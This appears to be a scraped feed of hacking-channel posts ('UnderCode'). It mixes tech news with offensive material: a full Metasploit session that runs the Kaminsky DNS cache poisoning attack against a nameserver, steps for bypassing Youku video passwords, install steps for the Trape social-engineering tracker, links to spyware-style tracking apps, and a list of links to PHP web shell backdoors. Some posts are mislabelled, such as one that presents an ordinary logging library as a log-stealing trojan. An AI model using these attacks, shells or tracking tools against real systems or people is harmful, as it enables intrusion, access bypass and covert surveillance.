Through NVIDIA Cloud Games, iOS users will be able to replay “Fortress Night”
#international #Updates

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SOME HACKER TOOLS:

- CrawlBox - Easy way to brute-force web directory..

- TrackOut - Simple Python IP Tracker.

- sslcaudit - No description provided

- Sublist3r - Fast subdomains enumeration tool for penetration testers.

- doork - Passive Vulnerability Auditor.

- sir - Skype Ip Resolver.

- xl-py - No description provided

- netdiscover - netdiscover.

- ATSCAN - Advanced dork Search & Mass Exploit Scanner.![->]

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A TROJAN FOR STEAL LOGS:

F E A T U R E S :
Concise API, it is easy to achieve diary record function through a few lines of code;

Use the AOP technologies Lancet SDK, it is comfortable to collect common logs, also support incremental compile;

Use mmap technology to ensure the efficiency of log records;
Scalability, developers can customize the log file to achieve the purpose of the upload;

Small traffic overhead, remote control user log file upload or not by online configuration;

High stability, it is very stable at many apps.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

DOWNLOAD https://github.com/eleme/Trojan

Add in the root directory's build.gradle:

buildscript {
dependencies {
......
classpath 'me.ele:lancet-plugin:1.0.2'
}
}
Add in the app directory's build.gradle:

apply plugin: 'me.ele.lancet'

dependencies {
......
provided 'me.ele:lancet-base:1.0.2'
compile 'me.ele:trojan-library:0.0.5'
}
Use

1) Initialization
Add in the custom Application:

TrojanConfig config = new TrojanConfig.Builder(this)
// Set user information
.userInfo("xxxx")
// Set device id
.deviceId("xxxx")
// Set cipher key if need encry log
.cipherKey("xxxx")
// Optional, save log file in sdcard by default
.logDir("xxxx")
// Console log switch, the default is open
.enableLog(true)
.build();
Trojan.init(config);
🦑Special Note:

The log files are stored in sdcard by default and will not be lost even if the application is uninstalled;
To be compatible with multiple processes, log files stored in their respective directories;
The log is not encrypted by default, we currently only provide TEA encryption in view for high efficiency。

2) Record the log
Trojan provides two ways to recode log:

Firstly:

Trojan.log("Trojan", "We have a nice day!");
Secondly:

List<String> msgList = new LinkedList <>();
msgList.add("Hello Trojan!");
msgList.add("We have a nice day!");
msgList.add("Hello world!");
Trojan.log("Trojan", msgList);
By default, a single line log is not encrypted, and if you need to encrypt it, the following is used:

Trojan.log("Trojan", "We have a nice day!", true);
3) User Information
When the user information changes or switch users, you can call:

Trojan.refreshUser("new user info");
Of course, if the user logs out, you can pass a null value:

Trojan.refreshUser(null);
4) Upload Solution
In Demo we provided free and simple way such as LeanCloud to upload log file, you can browse, download and download log file.

5) Data Decryption
When we set the encryption key, we can encrypt a single log to ensure the security of sensitive data. We must decrypt the encrypted data When we analyze the log. Use the decryption script as follows:

Compile and generate decryption SO library on MAC, The so library has been generated in the repository. This step can be omitted:

gcc -shared -Wl,-install_name,trojan_decrypt.so -o trojan_decrypt.so -fPIC trojan_decrypt.c
Call python script to decrypt the data on MAC, you need to pass in the decryption key and file path to be decrypted, it should be noted that the path of the python script:

python ./trojan_decrypt.py cipher-key cipher-file-path
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Kaminsky DNS Cache Poisoning Flaw Exploit for Domains:

This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain. By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache. This insertion completely replaces the original nameserver
records for the target domain.
Example
=======
# /msf3/msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######## ## #### ### ##### ##### ## #### #### #### ###
##
=[ msf v3.2-release
-- --=[ 298 exploits - 124 payloads
-- --=[ 18 encoders - 6 nops
=[ 73 aux
msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig short -t ns example.com @A.B.C.D
[*] exec: dig short -t ns example.com @A.B.C.D
b.iana-servers.net.
a.iana-servers.net.
msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.
[*] Querying recon nameserver for address of b.iana-servers.net....
[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236
[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.
[*] Querying recon nameserver for address of a.iana-servers.net....
[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43
[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....
[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Sent 11000 queries and 220000 spoofed responses...
[*] Sent 12000 queries and 240000 spoofed responses...
[*] Sent 13000 queries and 260000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com
[*] Auxiliary module execution completed
msf auxiliary(bailiwicked_domain) > dig short -t ns example.com @A.B.C.D
[*] exec: dig short -t ns example.com @A.B.C.D
dns01.metasploit.com.

Use for Learn !!
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Youku video cracking method with password :

1) You can set independent playback passwords for videos on Youku website, but you know: You don’t need a password to watch Youku videos with a password. The following describes two methods for cracking Youku video password.

Youku video password cracking 1:

2) Open the FLV analysis website, which is recommended here: http://www.flvcd.com, copy the Youku video address to be decrypted from the browser address bar, and paste the video address into the address box of the FLV analysis website , Click "Start GO to analyze. Get the real download address of the video file, right-click the download address, and select "Save Target As" to download (you can also use download tools such as Thunder, Express, etc. to download, the speed is very fast).

3)Youku Video Password cracking method 2:

Just add "xia" (without double quotes) in front of the video address youku. For example, http://v.youku.comv_sohw/id_xntg1mzc4ndq=.html, just change it to http://v .xiayouku.com/v_show/id_xntg1mzc4ndq=.html, the real download address of the video file can be parsed by typing in the browser. The next operation is the same as step 3 of method 1.


Use for Learn !!
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

New Vulnerability in Cisco SD-WAN.
#Vulnerabilities

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A GOOD WORKING TRACKING TOOL 2020 :

Trape is an OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control their users through their browser, without their knowlege, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/jofpin/trape.git

2) cd trape

3) python2 trape.py -h
If it does not work, try to install all the libraries that are located in the file requirements.txt

4) python2 -m pip install -r requirements.txt
Example of execution

🦑Example: python2 trape.py --url http://example.com --port 8080
HELP AND OPTIONS

user:~$ python2 trape.py --help
usage: python trape.py -u <> -p <> [-h] [-v] [-u URL] [-p PORT]
[-ak ACCESSKEY] [-l LOCAL]
[--update] [-n] [-ic INJC]

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑MalConfScan: Volatility plugin to extract configuration data for known malware:

Ursnif
Emotet
Smoke loader
PoisonIvy
CobaltStrike
NetWire
PlugX
RedLeaves / Himawari / Lavender / Armadill / zark20rk
TSCookie
TSC_Loader
xxmm
Datper
Ramnit
HawkEye
Lokibot
Bebloh (Shiotob / URLZone)
AZORult
NanoCore RAT
AgentTesla
FormBook
NodeRAT ( https://blogs.jpcert.or.jp/ja/2019/02/tick-activity.html )
MalConfScan has a function for displaying a list of strings referenced by malicious code.

Configuration data is usually encoded by malware.

The malware writes decoded configuration data to memory, it may be in memory.

This function can list decoded configuration data.

🦑https://github.com/JPCERTCC/MalConfScan/wiki/how-to-install

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑🐧 How to install Apache mod_cloudflare on Debian ?

1) Cloudflare provides an official module for Apache server to capture real IP address.

2) Add GPG - Open Terminal and run the following commands to enable adding the gpg key to your system.

sudo apt install curl

curl -C - https://pkg.cloudflare.com/pubkey.gpg | sudo apt-key add -

Add PPA - then add cloudflare repository to your debian system

echo "deb http://pkg.cloudflare.com/ lsb_release -cs main" |
sudo tee /etc/apt/sources.list.d/cloudflare.list

3) Install the package - then update the Apt cache and install the libapache2-mod-cloudflare package on your Ubuntu system.
sudo apt update

sudo apt install libapache2-mod-cloudflare

4) Press "Y" to confirm the request during installation.
Restart Apache

5) After the installation is complete, restart the Apache2 service and check the active modules using the following commands.

sudo systemctl restart apache2
It's all.

6) The Apache server now logs the visitor's real IP address.
sudo apache2ctl -M
@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Preview of Apple Conference in November.
#Technologies

READ MORE - https://undercodenews.com/preview-of-apple-conference-in-november/07/11/2020/

New Unpatched IBM QRadar SIEM vulnerability could allow a attacker can bypass access restrictions to data.
#Vulnerabilities

READ MORE - https://undercodenews.com/new-unpatched-ibm-qradar-siem-vulnerability-could-allow-a-attacker-can-bypass-access-restrictions-to-data/07/11/2020/

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 GPS TRACKING APPLICATIONS:

https://play.google.com/store/apps/details?id=com.gpsmapcamera.geotagginglocationonphoto&hl=en

https://play.google.com/store/apps/details?id=org.findmykids.app&hl=en_IN

https://apps.apple.com/us/app/google-maps-transit-food/id585027354

https://play.google.com/store/apps/details?id=com.google.android.apps.maps&hl=en_US

https://apps.apple.com/us/app/famisafe-parental-control/id1385417904

https://play.google.com/store/apps/details?id=com.wondershare.famisafe

https://apps.apple.com/us/app/life360-family-locator/id384830320

https://play.google.com/store/apps/details?id=com.life360.android.safetymapd&hl=en

https://my.spyzie.com/signup.html

https://apps.apple.com/us/app/glympse-share-your-location/id330316698

https://play.google.com/store/apps/details?id=com.glympse.android.glympse

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Largest cryptocurrency seizure: $1,000,000,000 was seized from the wallet of the Silk Road.
#DataBreaches

New Critical unpatched Vulnerability in Micro Focus can leak the password login.
#Vulnerabilities

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is PaaS?

1) Platform-as-a-Service (PaaS) is a cloud computing model that provides a platform on which customers can develop, secure, run, and manage web applications.
It provides an optimized environment in which different teams can develop and deploy applications without buying or managing the underlying IT infrastructure and related services.

2) Typically, the platform provides the necessary resources and infrastructure to support the entire software development and deployment lifecycle, while providing developers and users with access from anywhere over the Internet.

3) The benefits of PaaS include, but are not limited to, simplicity, convenience, lower cost, flexibility, and scalability.

4) Typically PaaS protection differs from a traditional on-premises datacenter, as we'll see.

5) The PaaS environment is based on a shared security model.

6) The provider protects the infrastructure, and PaaS customers are responsible for protecting their accounts, applications, and data hosted on the platform.
Ideally, security moves from a local security model to an identity perimeter.

This means that the PaaS customer must place more emphasis on identity as the primary security perimeter.

Issues to look out for include security, testing, code, data and configuration, employees, users, authentication, operations, monitoring, and logs.

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PHP backdoors shells new:

[Simple Shell](https://github.com/backdoorhub/shell-backdoor-list/blob/master/shell/php/simple-shell.php)

B374K Shell

[C99 Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/c99.php)

R57 Shell

[Wso Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wso.php)

0byt3m1n1 Shell

[Alfa Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/alfa.php)

AK-47 Shell

[Indoxploit Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/indoxploit.php)

Marion001 Shell

[Mini Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/mini.php)

p0wny-shell

[Sadrazam Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/sadrazam.php)

Webadmin Shell

[Wordpress Shell](https://github.com/ismailtasdelen/shell-backdoor-list/blob/master/shell/php/wordpress.php)

LazyShell

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁